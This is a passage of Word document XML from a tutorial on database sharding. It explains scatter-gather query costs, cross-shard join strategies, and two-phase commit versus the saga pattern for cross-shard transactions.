        <w:t xml:space="preserve">  3. Merge N partial results → final result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D32D6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5AB42B16" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Latency: max(shard_latency_1, shard_latency_2, ..., shard_latency_N) + merge_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5C1AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">         ≈ single-shard latency (parallel) + small merge overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544367C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">         BUT: subject to tail latency (slowest shard determines overall latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EAF9B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="057A533F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Throughput cost: N queries (one per shard) instead of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D85E18" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When scatter-gather is acceptable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479EA020" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1558"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>N is small (&lt; 20 shards).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71CA90" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1558"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Query is infrequent (analytics, admin, not user-facing hot path).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4774AF1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1558"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Results are small per shard (aggregatable without massive data transfer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626E92DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When scatter-gather is unacceptable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47055CB6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>N is large (100+ shards) → query amplification is extreme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C29AF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Query is on the hot path (must be &lt; 10ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBEEDCF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Requires sorting/joining across full datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B60B5E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Cross-Shard Joins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF07F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47406684" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9B81D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">SELECT u.name, o.total </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608E210" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>FROM users u JOIN orders o ON u.id = o.user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD55C1F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>WHERE o.status = 'pending';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C0912" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0334E277" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>If users and orders are on DIFFERENT shards (different shard keys or different tables sharded differently):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0AA80" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Cannot JOIN locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF9BDFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Must fetch from both, join in application layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA099F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614FDE85" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Co-locate related data on the same shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50187247" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E4DF17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard by user_id for BOTH users and orders tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4F5244" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → All of user 42's data (profile + orders) is on the same shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D13DD88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → JOINs between users and orders for the same user are LOCAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E269AB9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → This is why shard key choice is so critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A8FC4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Denormalization (duplicate data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239FC89" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A05AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Instead of JOIN: embed user.name directly in the orders table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D801D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  orders: {id, user_id, user_name, total, status}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CB0F44" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1550BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>No JOIN needed — user_name is already in orders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C71C82" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cost: data duplication, update complexity (must update user_name in all orders if it changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9D6365" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Application-level join (query both, merge in code):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFAEE0F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088BA386" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t># Fetch from orders shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CF8B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>pending_orders = orders_shard.query("SELECT user_id, total FROM orders WHERE status = 'pending'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE3E53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0399D8B0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t># Fetch user names from users shard(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A85F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>user_ids = [o.user_id for o in pending_orders]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54915C9F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>users = users_shard.query("SELECT id, name FROM users WHERE id IN (?)", user_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B1314" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4337E5DE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t># Join in application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A5C4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>result = merge(pending_orders, users, on='user_id')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B33C9F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Materialized view / pre-computed join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD7FA52" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AB03B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Background process periodically computes the join result and stores it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA5AD8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Queries read from the materialized view (fast, no real-time join needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C08BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cost: staleness (view may be slightly out of date).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927B5F1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Cross-Shard Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437BA762" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D1235B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67464235" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Transfer $100 from User A (Shard 1) to User B (Shard 3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D66D7AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Step 1: Debit $100 from User A's balance (Shard 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6CDB51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Step 2: Credit $100 to User B's balance (Shard 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1426999B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="27DF875B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Both must succeed or both must fail (atomicity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455882CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>But they're on different databases (no shared transaction manager).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EDD05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution 1: Two-Phase Commit (2PC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91EDE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45604561" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Coordinator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19527641" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Phase 1 (PREPARE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F5131" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Shard 1: "PREPARE to debit $100 from A" → Shard 1: "READY"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142A7369" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Shard 3: "PREPARE to credit $100 to B" → Shard 3: "READY"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9A35DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261184BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  All shards ready?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DAFD0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    YES → Phase 2 (COMMIT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE62AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → Shard 1: "COMMIT" → done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C75D2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → Shard 3: "COMMIT" → done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650AD23" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F0C3B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    NO (any shard says ABORT) → Phase 2 (ROLLBACK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54F84B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → Shard 1: "ROLLBACK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C62C50" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      → Shard 3: "ROLLBACK"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179ED574" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2PC problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F7531" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1560"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> If coordinator crashes after PREPARE but before COMMIT → all participants are stuck (holding locks, waiting for coordinator to recover).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFBF88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1560"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> 2 round trips minimum (prepare + commit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79937901" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1560"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> If any participant is unreachable → cannot proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299608D6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1560"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Locks held across network round trips → high contention under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDDBBC0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution 2: Saga Pattern (compensating transactions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0478B5EE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E824A2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Saga: a sequence of local transactions with compensating actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D22508" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="79E37700" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Forward:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265925B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Shard 1: Debit $100 from A (local transaction, committed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450810AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Shard 3: Credit $100 to B (local transaction, committed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6174B614" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A196C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  If step 2 fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E1D40" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Compensate step 1: Credit $100 back to A (undo the debit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24F200" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2064A3FF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>No distributed locks. Each step is a committed local transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF437BD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Eventual consistency (brief window where A is debited but B isn't credited yet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B4026" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Saga trade-offs:</w:t>
      </w:r>
    </w:p>
